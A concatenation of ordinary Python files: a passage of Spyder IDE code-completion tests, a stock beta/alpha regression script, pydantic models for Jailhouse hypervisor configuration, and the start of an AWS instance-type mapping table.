qtbot.keyClicks(code_editor, 'math.aangle')
for i in range(len('angle')):
qtbot.keyClick(code_editor, Qt.Key_Left)
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, 's')
assert "asin(x)" in [x['label'] for x in sig.args[0]]
qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
for i in range(len('angle')):
qtbot.keyClick(code_editor, Qt.Key_Right)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\nmath.asin\n'\
'math.f\nmath.asin\n'\
'math.asinangle\n'
# Check math.a <tab> <backspace> <escape> do not emit sig_show_completions
qtbot.keyClicks(code_editor, 'math.a')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, Qt.Key_Backspace)
qtbot.keyPress(code_editor, Qt.Key_Escape)
raise RuntimeError("The signal should not have been received!")
except pytestqt.exceptions.TimeoutError:
pass
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, Qt.Key_Return)
raise RuntimeError("The signal should not have been received!")
except pytestqt.exceptions.TimeoutError:
pass
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\nmath.asin\n'\
'math.f\nmath.asin\n'\
'math.asinangle\n'\
'math.\n'
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(not rtree_available or PY2 or os.name == 'nt',
reason='Only works if rtree is installed')
def test_code_snippets(lsp_codeeditor, qtbot):
assert rtree_available
code_editor, lsp = lsp_codeeditor
completion = code_editor.completion_widget
snippets = code_editor.editor_extensions.get('SnippetsExtension')
CONF.set('lsp-server', 'code_snippets', True)
lsp.update_configuration()
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(True)
# Set cursor to start
code_editor.go_to_line(1)
text = """
def test_func(xlonger, y1, some_z):
pass
"""
text = textwrap.dedent(text)
code_editor.insert_text(text)
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert 'test_func(xlonger, y1, some_z)' in {
x['label'] for x in sig.args[0]}
expected_insert = 'test_func(${1:xlonger}, ${2:y1}, ${3:some_z})$0'
insert = sig.args[0][0]
assert expected_insert == insert['insertText']
assert snippets.is_snippet_active
assert code_editor.has_selected_text()
# Rotate through snippet regions
cursor = code_editor.textCursor()
arg1 = cursor.selectedText()
assert 'xlonger' == arg1
assert snippets.active_snippet == 1
qtbot.keyPress(code_editor, Qt.Key_Tab)
cursor = code_editor.textCursor()
arg2 = cursor.selectedText()
assert 'y1' == arg2
assert snippets.active_snippet == 2
qtbot.keyPress(code_editor, Qt.Key_Tab)
cursor = code_editor.textCursor()
arg2 = cursor.selectedText()
assert 'some_z' == arg2
assert snippets.active_snippet == 3
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert not snippets.is_snippet_active
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
# Replace selection
qtbot.keyClicks(code_editor, 'arg1')
qtbot.wait(5000)
# Snippets are disabled when there are no more left
for _ in range(0, 3):
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert not snippets.is_snippet_active
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.StartOfBlock)
cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
text1 = cursor.selectedText()
assert text1 == 'test_func(arg1, y1, some_z)'
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert snippets.active_snippet == 2
# Extend text from right
qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
qtbot.keyClicks(code_editor, '_var')
qtbot.keyPress(code_editor, Qt.Key_Up, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Down, delay=300)
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.StartOfBlock)
cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
text1 = cursor.selectedText()
assert text1 == 'test_func(xlonger, y1_var, some_z)'
cursor.movePosition(QTextCursor.EndOfBlock)
code_editor.setTextCursor(cursor)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
for _ in range(0, 2):
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert snippets.active_snippet == 3
# Extend text from left
qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
qtbot.keyClicks(code_editor, 's')
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert not snippets.is_snippet_active
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.StartOfBlock)
cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
text1 = cursor.selectedText()
assert text1 == 'test_func(xlonger, y1, ssome_z)'
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert snippets.active_snippet == 1
# Delete snippet region
qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Backspace, delay=300)
assert len(snippets.snippets_map) == 3
qtbot.keyPress(code_editor, Qt.Key_Tab)
cursor = code_editor.textCursor()
arg1 = cursor.selectedText()
assert 'some_z' == arg1
# Undo action
with qtbot.waitSignal(code_editor.sig_undo,
timeout=10000) as sig:
code_editor.undo()
assert len(snippets.snippets_map) == 4
for _ in range(0, 2):
qtbot.keyPress(code_editor, Qt.Key_Tab)
cursor = code_editor.textCursor()
arg1 = cursor.selectedText()
assert 'some_z' == arg1
with qtbot.waitSignal(code_editor.sig_redo,
timeout=10000) as sig:
code_editor.redo()
assert len(snippets.snippets_map) == 3
for _ in range(0, 3):
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, Qt.Key_Right)
qtbot.keyPress(code_editor, Qt.Key_Enter)
qtbot.keyPress(code_editor, Qt.Key_Backspace)
qtbot.keyClicks(code_editor, 'test_')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
# Delete text
qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Backspace)
for _ in range(0, 3):
qtbot.keyPress(code_editor, Qt.Key_Tab)
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.StartOfBlock)
cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
text1 = cursor.selectedText()
assert text1 == 'test_func(longer, y1, some_z)'
CONF.set('lsp-server', 'code_snippets', False)
lsp.update_configuration()
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.skipif((not rtree_available
or not check_if_kite_installed()
or not check_if_kite_running()),
reason="Only works if rtree is installed."
"It's not meant to be run without kite installed "
"and runnning")
def test_kite_code_snippets(kite_codeeditor, qtbot):
"""
Test kite code snippets completions without initial placeholder.
See spyder-ide/spyder#10971
"""
assert rtree_available
code_editor, kite = kite_codeeditor
completion = code_editor.completion_widget
snippets = code_editor.editor_extensions.get('SnippetsExtension')
CONF.set('lsp-server', 'code_snippets', True)
CONF.set('kite', 'enable', True)
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(True)
kite.update_configuration()
# Set cursor to start
code_editor.go_to_line(1)
qtbot.keyClicks(code_editor, 'import numpy as np')
qtbot.keyPress(code_editor, Qt.Key_Return)
qtbot.keyClicks(code_editor, 'np.sin')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert 'sin('+u'\u2026'+')' in {
x['label'] for x in sig.args[0]}
expected_insert = 'sin($1)$0'
insert = sig.args[0][0]
assert expected_insert == insert['insertText']
# Insert completion
qtbot.wait(500)
qtbot.keyPress(completion, Qt.Key_Tab)
assert snippets.is_snippet_active
# Get code selected text
cursor = code_editor.textCursor()
arg1 = cursor.selectedText()
assert '' == arg1
assert snippets.active_snippet == 1
code_editor.set_cursor_position('eol')
qtbot.keyPress(code_editor, Qt.Key_Left)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig2:
code_editor.do_completion()
assert '<x>)' in {x['label'] for x in sig2.args[0]}
expected_insert = '${1:[x]})$0'
insert = sig2.args[0][0]
assert expected_insert == insert['textEdit']['newText']
qtbot.keyPress(completion, Qt.Key_Tab)
# Snippets are disabled when there are no more left
code_editor.set_cursor_position('eol')
qtbot.keyPress(code_editor, Qt.Key_Enter)
assert not snippets.is_snippet_active
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.PreviousBlock)
cursor.movePosition(QTextCursor.StartOfBlock)
cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
text1 = cursor.selectedText()
assert text1 == 'np.sin([x])'
CONF.set('lsp-server', 'code_snippets', False)
CONF.set('kite', 'enable', False)
kite.update_configuration()
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_completion_order(lsp_codeeditor, qtbot):
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
# Set cursor to start
code_editor.go_to_line(1)
qtbot.keyClicks(code_editor, 'impo')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
first_completion = sig.args[0][0]
assert first_completion['insertText'] == 'import'
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'Impo')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
first_completion = sig.args[0][0]
assert first_completion['insertText'] == 'ImportError'
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(not sys.platform.startswith('linux') or PY2,
reason='Only works on Linux and Python 3')
@flaky(max_runs=5)
def test_fallback_completions(fallback_codeeditor, qtbot):
code_editor, _ = fallback_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.go_to_line(1)
# Add some words in comments
qtbot.keyClicks(code_editor, '# some comment and whole words')
code_editor.document_did_change()
# Enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=1000)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'wh')
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
# Assert all retrieved words start with 'wh'
assert all({x['insertText'].startswith('wh') for x in sig.args[0]})
# Delete 'wh'
for _ in range(2):
qtbot.keyPress(code_editor, Qt.Key_Backspace)
# Insert another word
qtbot.keyClicks(code_editor, 'another')
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'a')
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
word_set = {x['insertText'] for x in sig.args[0]}
assert 'another' in word_set
# Assert that keywords are also retrieved
assert 'assert' in word_set
for _ in range(3):
qtbot.keyPress(code_editor, Qt.Key_Backspace)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'a')
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
word_set = {x['insertText'] for x in sig.args[0]}
assert 'another' not in word_set
# Check that fallback doesn't give an error with utf-16 characters.
# This is a regression test for issue spyder-ide/spyder#11862.
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
code_editor.append("'😒 foobar'")
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
qtbot.keyClicks(code_editor, 'foob')
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
word_set = {x['insertText'] for x in sig.args[0]}
assert 'foobar' in word_set
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_text_snippet_completions(snippets_codeeditor, qtbot):
code_editor, _ = snippets_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.go_to_line(1)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'f')
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
# Assert all retrieved words start with 'f'
assert all({x['sortText'][1] in {'for', 'from'} for x in sig.args[0]})
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_kite_textEdit_completions(mock_completions_codeeditor, qtbot):
"""Test textEdit completions such as those returned by the Kite provider.
This mocks out the completions response, and does not test the Kite
provider directly.
"""
code_editor, mock_response = mock_completions_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.go_to_line(1)
qtbot.keyClicks(code_editor, 'my_dict.')
# Complete my_dict. -> my_dict["dict-key"]
mock_response.side_effect = lambda lang, method, params: {'params': [{
'kind': CompletionItemKind.TEXT,
'label': '["dict-key"]',
'textEdit': {
'newText': '["dict-key"]',
'range': {
'start': 7,
'end': 8,
},
},
'filterText': '',
'sortText': '',
'documentation': '',
'provider': KITE_COMPLETION,
}]} if method == LSPRequestTypes.DOCUMENT_COMPLETION else None
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
mock_response.side_effect = None
assert '["dict-key"]' in [x['label'] for x in sig.args[0]]
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'my_dict["dict-key"]\n'
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(os.name == 'nt', reason='Hangs on Windows')
def test_completions_extra_paths(lsp_codeeditor, qtbot, tmpdir):
"""Exercise code completion when adding extra paths."""
code_editor, lsp_plugin = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Create a file to use as extra path
temp_content = '''
def spam():
pass
'''
CONF.set('main', 'spyder_pythonpath', [])
lsp_plugin.update_configuration()
qtbot.wait(500)
qtbot.keyClicks(code_editor, 'import foo')
qtbot.keyPress(code_editor, Qt.Key_Enter)
qtbot.keyClicks(code_editor, 'foo.s')
code_editor.document_did_change()
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.wait(500)
assert code_editor.toPlainText() == 'import foo\nfoo.s'
p = tmpdir.mkdir("extra_path")
extra_paths = [str(p)]
p = p.join("foo.py")
p.write(temp_content)
# Set extra paths
print(extra_paths)
CONF.set('main', 'spyder_pythonpath', extra_paths)
lsp_plugin.update_configuration()
code_editor.document_did_change()
qtbot.wait(500)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "spam()" in [x['label'] for x in sig.args[0]]
assert code_editor.toPlainText() == 'import foo\nfoo.spam'
# Reset extra paths
CONF.set('main', 'spyder_pythonpath', [])
lsp_plugin.update_configuration()
qtbot.wait(500)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.environ.get('CI') is None,
reason='Run tests only on CI.')
@flaky(max_runs=5)
def test_completions_environment(lsp_codeeditor, qtbot, tmpdir):
"""Exercise code completion when adding extra paths."""
code_editor, lsp_plugin = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Get jedi test env
conda_envs_path = os.path.dirname(sys.prefix)
conda_jedi_env = os.path.join(conda_envs_path, 'jedi-test-env')
if os.name == 'nt':
py_exe = os.path.join(conda_jedi_env, 'python.exe')
else:
py_exe = os.path.join(conda_jedi_env, 'bin', 'python')
print(sys.executable)
print(py_exe)
assert os.path.isfile(py_exe)
# Set environment
set_executable_config_helper()
lsp_plugin.update_configuration()
qtbot.keyClicks(code_editor, 'import flas')
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.wait(2000)
assert code_editor.toPlainText() == 'import flas'
# Reset extra paths
set_executable_config_helper(py_exe)
lsp_plugin.update_configuration()
code_editor.set_text('')
qtbot.keyClicks(code_editor, 'import flas')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "flask" in [x['label'] for x in sig.args[0]]
assert code_editor.toPlainText() == 'import flask'
set_executable_config_helper()
lsp_plugin.update_configuration()
if __name__ == '__main__':
pytest.main(['test_introspection.py', '--run-slow'])
|
import datetime
import numpy as np
import pandas as pd
from pandas_datareader.data import DataReader
import matplotlib.pyplot as plt
import statsmodels.api as sm
from scipy import stats
# BETA, ALPHA, OLS REGRESSION
stock = 'MSFT'
start_date = datetime.datetime(2014,12,28)
end_date = datetime.date.today()
df = DataReader(stock, 'yahoo', start_date, end_date)['Close']
sp_500 = DataReader('^GSPC', 'yahoo', start_date, end_date)['Close']
# joining the closing prices of the two datasets
monthly_prices = pd.concat([df, sp_500], axis=1)
monthly_prices.columns = [stock, '^GSPC']
# calculate monthly returns
monthly_returns = monthly_prices.pct_change(1)
clean_monthly_returns = monthly_returns.dropna(axis=0) # drop first missing row
# split dependent and independent variable
X = clean_monthly_returns['^GSPC']
y = clean_monthly_returns[stock]
# Add a constant to the independent value
X1 = sm.add_constant(X)
# make regression model
model = sm.OLS(y, X1)
# fit model and print results
results = model.fit()
print(results.summary())
# alternatively scipy linear regression
slope, intercept, r_value, p_value, std_err = stats.linregress(X, y)
plt.figure(figsize=(14,7))
X.plot()
y.plot()
plt.ylabel("Daily Returns")
fig, ax = plt.subplots()
plt.show()
# Calculate the mean of x and y
Xmean = np.mean(X)
ymean = np.mean(y)
# Calculate the terms needed for the numerator and denominator of beta
df['xycov'] = (X.dropna() - Xmean)*(y.dropna() - ymean)
df['xvar'] = (X.dropna() - Xmean)**2
#Calculate beta and alpha
beta = df['xycov'].sum()/df['xvar'].sum()
alpha = ymean-(beta*Xmean)
print(f'alpha = {alpha}')
print(f'beta = {beta}')
# Generate Line
xlst = np.linspace(np.min(X),np.max(X),100)
ylst = np.array([beta*xvl+alpha for xvl in xlst])
# Plot
plt.scatter(X, y, alpha=0.5)
plt.scatter(X, y, color='r')
plt.scatter(y, X, color='b')
plt.plot(xlst,ylst,'k-')
plt.title(f'Percentage Returns for {stock} against the S&P 500')
plt.xlabel('Company')
plt.ylabel('S&P 500')
plt.grid()
ax = plt.gca()
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_position('zero')
ax.spines['left'].set_position('zero')
ax.spines['right'].set_color('none')
fig, ax = plt.subplots()
plt.show() |
# FIXME: Dicts should be replaced by OrderedDict when 3.6 support is dropped
from pathlib import Path
from typing import Dict, List, Optional, Union
from pydantic import BaseModel
from pydantic.networks import IPvAnyInterface, IPvAnyNetwork
from typing_extensions import Literal
from .board import (
Board,
DeviceMemoryRegion,
HypervisorMemoryRegion,
MemoryRegion,
ShMemNetRegion,
)
from .datatypes import ByteSize, ExpressionInt, HexInt, IntegerList
class DebugConsole(BaseModel):
address: HexInt
size: ByteSize
type: str
flags: List[str] # FIXME: Use list of ENUM
class AMDIOMMUConfig(BaseModel):
bdf: Optional[ExpressionInt]
base_cap: Optional[HexInt]
msi_cap: Optional[HexInt]
features: Optional[ExpressionInt]
class TIPVUIOMMUConfig(BaseModel):
tlb_base: Optional[ExpressionInt]
tlb_size: Optional[ByteSize]
class IOMMUConfig(BaseModel):
type: Optional[str]
base: Optional[HexInt]
size: Optional[ByteSize]
arch: Union[AMDIOMMUConfig, TIPVUIOMMUConfig, None] = None
class PlatformInfoArm(BaseModel):
maintenance_irq: Optional[ExpressionInt]
gic_version: Optional[ExpressionInt]
gicd_base: Optional[HexInt]
gicc_base: Optional[HexInt]
gich_base: Optional[HexInt]
gicv_base: Optional[HexInt]
gicr_base: Optional[HexInt]
iommu_units: List[IOMMUConfig] = []
class PlatformInfoX86(BaseModel):
pm_timer_address: Optional[HexInt]
vtd_interrupt_limit: Optional[ExpressionInt]
apic_mode: Optional[HexInt]
tsc_khz: Optional[ExpressionInt]
apic_khz: Optional[ExpressionInt]
iommu_units: List[IOMMUConfig] = []
class PlatformInfo(BaseModel):
pci_mmconfig_end_bus: HexInt
pci_is_virtual: bool
pci_domain: int
pci_mmconfig_base: Optional[HexInt]
arch: Union[PlatformInfoArm, PlatformInfoX86, None] = None
class IRQChip(BaseModel):
address: HexInt
pin_base: int
interrupts: IntegerList
@property
def pin_bitmap(self) -> List[str]:
SIZE = 32 # noqa
count = 0
res = []
update = None
store = None
init: Union[None, str, int] = None
pin_base = self.pin_base
if len(self.interrupts) > 5:
def update(current_item, irq, count):
# print("Update:", irq, pin_base, count)
return current_item | 1 << (irq - (pin_base + count))
def store(item):
return "0x%x" % item
init = 0
else:
def update(current_item, irq, count):
res = (
current_item
+ ("" if not current_item else " | ")
+ f"1 << ({irq} - {pin_base + count})"
)
return res
def store(x):
return "0x0" if x == "" else x
init = ""
current_item = init
for irq in self.interrupts:
while irq - pin_base >= count + SIZE:
res.append(store(current_item))
current_item = init
count += SIZE
current_item = update(current_item, irq, count)
if current_item:
res.append(store(current_item))
while len(res) < 4:
res.append(store(init))
return res
class PCIDevice(BaseModel):
type: str
domain: int
bdf: ExpressionInt
bar_mask: str
shmem_regions_start: Optional[int]
shmem_dev_id: Optional[int]
shmem_peers: Optional[int]
shmem_protocol: Optional[str]
# List of corresponding memory regions
memory_regions: List[DeviceMemoryRegion] = []
@property
def bus(self) -> int:
return (int(self.bdf) >> 8) & 0xFF # 8 Bits
@property
def device(self) -> int:
return (int(self.bdf) >> 3) & 0x1F # 5 Bits
@property
def function(self) -> int:
return int(self.bdf) & 0x7 # 3 Bits
class CellConfig(BaseModel):
type: str
name: str
vpci_irq_base: Optional[ExpressionInt]
flags: List[str] = []
network_renderer: Literal["interfaces", "cmdline"] = "interfaces"
image: Optional[str] = None
hypervisor_memory: Optional[HypervisorMemoryRegion]
debug_console: Union[str, DebugConsole]
platform_info: Optional[PlatformInfo]
cpus: Optional[IntegerList]
memory_regions: Optional[
Dict[str, Union[str, ShMemNetRegion, MemoryRegion, DeviceMemoryRegion]]
] = {}
irqchips: Optional[Dict[str, IRQChip]] = {}
pci_devices: Optional[Dict[str, PCIDevice]] = {}
image_path: Optional[Path] = None
class ShmemConfig(BaseModel):
protocol: Literal[
"SHMEM_PROTO_UNDEFINED", "SHMEM_VIRTIO_BACK", "SHMEM_PROTO_VETH"
]
peers: List[str]
common_output_region_size: Optional[ByteSize]
per_device_region_size: Optional[ByteSize]
class InterfaceConfig(BaseModel):
addresses: List[IPvAnyInterface]
interface: Optional[str] = None
class ShmemConfigNet(ShmemConfig):
protocol: Literal["SHMEM_PROTO_VETH"]
network: Union[List[IPvAnyNetwork], Dict[str, InterfaceConfig]] = {}
class JailhouseConfig(BaseModel):
cells: Dict[str, CellConfig]
shmem: Optional[Dict[str, Union[ShmemConfigNet, ShmemConfig]]] = None
@property
def root_cell(self) -> CellConfig:
for cell in self.cells.values():
if cell.type == "root":
return cell
raise Exception("No root cell found")
if __name__ == "__main__":
import sys
from pprint import pprint
import yaml
with open(sys.argv[1]) as yaml_file:
yaml_dict = yaml.safe_load(yaml_file)
pprint(yaml_dict, indent=2) # noqa
board = Board(**yaml_dict)
pprint(board, indent=2) # noqa
|
"""
The MIT License (MIT)
Copyright (c) 2016 Paolo Smiraglia
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Maps defined in
https://s3-us-west-2.amazonaws.com/cloudformation-templates-us-west-2/
EC2InstanceWithSecurityGroupSample.template
"""
AWSInstanceType2Arch = {
"t1.micro": {"Arch": "PV64"},
"t2.nano": {"Arch": "HVM64"},
"t2.micro": {"Arch": "HVM64"},
"t2.small": {"Arch": "HVM64"},
"t2.medium": {"Arch": "HVM64"},
"t2.large": {"Arch": "HVM64"},
"m1.small": {"Arch": "PV64"},
"m1.medium": {"Arch": "PV64"},
"m1.large": {"Arch": "PV64"},
"m1.xlarge": {"Arch": "PV64"},
"m2.xlarge": {"Arch": "PV64"},
"m2.2xlarge": {"Arch": "PV64"},
"m2.4xlarge": {"Arch": "PV64"},
"m3.medium": {"Arch": "HVM64"},
"m3.large": {"Arch": "HVM64"},
"m3.xlarge": {"Arch": "HVM64"},
"m3.2xlarge": {"Arch": "HVM64"},
"m4.large": {"Arch": "HVM64"},
"m4.xlarge": {"Arch": "HVM64"},
"m4.2xlarge": {"Arch": "HVM64"},
"m4.4xlarge": {"Arch": "HVM64"},
"m4.10xlarge": {"Arch": "HVM64"},
"c1.medium": {"Arch": "PV64"},
"c1.xlarge": {"Arch": "PV64"},
"c3.large": {"Arch": "HVM64"},
"c3.xlarge": {"Arch": "HVM64"},
"c3.2xlarge": {"Arch": "HVM64"},
"c3.4xlarge": {"Arch": "HVM64"},
"c3.8xlarge": {"Arch": "HVM64"},
"c4.large": {"Arch": "HVM64"},
"c4.xlarge": {"Arch": "HVM64"},
"c4.2xlarge": {"Arch": "HVM64"},
"c4.4xlarge": {"Arch": "HVM64"},
"c4.8xlarge": {"Arch": "HVM64"},
"g2.2xlarge": {"Arch": "HVMG2"},
"g2.8xlarge": {"Arch": "HVMG2"},
"r3.large": {"Arch": "HVM64"},
"r3.xlarge": {"Arch": "HVM64"},
"r3.2xlarge": {"Arch": "HVM64"},
"r3.4xlarge": {"Arch": "HVM64"},
"r3.8xlarge": {"Arch": "HVM64"},
"i2.xlarge": {"Arch": "HVM64"},
"i2.2xlarge": {"Arch": "HVM64"},
"i2.4xlarge": {"Arch": "HVM64"},
"i2.8xlarge": {"Arch": "HVM64"},
"d2.xlarge": {"Arch": "HVM64"},
"d2.2xlarge": {"Arch": "HVM64"},
"d2.4xlarge": {"Arch": "HVM64"},
"d2.8xlarge": {"Arch": "HVM64"},
"hi1.4xlarge": {"Arch": "HVM64"},
"hs1.8xlarge": {"Arch": "HVM64"},
"cr1.8xlarge": {"Arch": "HVM64"},
"cc2.8xlarge": {"Arch": "HVM64"}
}
AWSInstanceType2NATArch = {
"t1.micro": {"Arch": "NATPV64"},
"t2.nano": {"Arch": "NATHVM64"},
"t2.micro": {"Arch": "NATHVM64"},
"t2.small": {"Arch": "NATHVM64"},
"t2.medium": {"Arch": "NATHVM64"},
"t2.large": {"Arch": "NATHVM64"},
"m1.small": {"Arch": "NATPV64"},
"m1.medium": {"Arch": "NATPV64"},
"m1.large": {"Arch": "NATPV64"},
"m1.xlarge": {"Arch": "NATPV64"},
"m2.xlarge": {"Arch": "NATPV64"},
"m2.2xlarge": {"Arch": "NATPV64"},
"m2.4xlarge": {"Arch": "NATPV64"},
"m3.medium": {"Arch": "NATHVM64"},
